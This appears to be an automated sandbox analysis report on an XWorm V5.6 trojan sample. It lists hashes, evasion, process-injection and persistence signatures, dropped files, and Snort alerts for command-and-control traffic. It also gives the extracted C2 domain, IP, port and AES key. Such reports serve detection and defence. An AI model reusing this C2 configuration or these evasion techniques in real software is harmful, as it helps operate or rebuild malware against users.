Windows Analysis Report
x433.exe

Overview

General Information

Sample name: x433.exe
Analysis ID: 1465714
MD5: 148ec472df90b0fb274c3ce2ad2e811f
SHA1: 378ba02b08494b36ff5a2674cf99eba6c7025d6a
SHA256: a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: x433.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Local\x4usb.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["session-chief.gl.at.ply.gg"], "Port": "36125", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\x4host.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\x4usb.exe ReversingLabs: Detection: 91%
Source: x433.exe ReversingLabs: Detection: 76%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\x4usb.exe Joe Sandbox ML: detected
Source: x433.exe Joe Sandbox ML: detected
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: session-chief.gl.at.ply.gg
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: 36125
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: <123456789>
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: XWorm V5.6
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: USB.exe
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: %LocalAppData%
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: x4usb.exe
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 1_2_00401000
Source: x433.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: x433.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 FindFirstFileExW, 5_2_000002D8B0A6E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 FindFirstFileExW, 6_2_00000225DC64E630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 FindFirstFileExW, 7_2_00000202C0AEE630
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 FindFirstFileExW, 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 FindFirstFileExW, 9_2_000002BAAE26E630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 FindFirstFileExW, 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 FindFirstFileExW, 11_2_00000179537AE630
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88ED12h 2_2_00007FFD9B88EB44
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88FEE4h 2_2_00007FFD9B88F869
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88FEF5h 2_2_00007FFD9B88F869
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B890AB4h 2_2_00007FFD9B88BE28

Networking

Source: Traffic Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49732 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49732 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49732
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
Source: Malware configuration extractor URLs: session-chief.gl.at.ply.gg
Source: global traffic TCP traffic: 147.185.221.20 ports 1,2,3,5,6,36125
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 147.185.221.20:36125
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View IP Address: 147.185.221.20
Source: Joe Sandbox View ASN Name: TUT-ASUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: session-chief.gl.at.ply.gg
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: svchost.exe, 00000025.00000002.2953015111.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.2951243071.0000026EF4C21000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000007.00000000.1744351768.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, x4host.exe.0.dr, x4usb.exe.2.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899835829.0000026EF4C6A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000011.00000000.1809587946.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000023.00000002.3004729739.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1889283300.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1890717083.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3000838222.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comSRD1%
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE4E45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1782623387.0000021FFC1A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com3J
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3022802035.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893559438.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comSRD13
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.dr String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: svchost.exe, 00000023.00000000.1892174406.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3013226921.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3020897864.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3011954167.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893396897.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comSRD1#

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, RemoteDesktop.cs .Net Code: GetScreen

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: 01 00 00 00

System Summary

Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
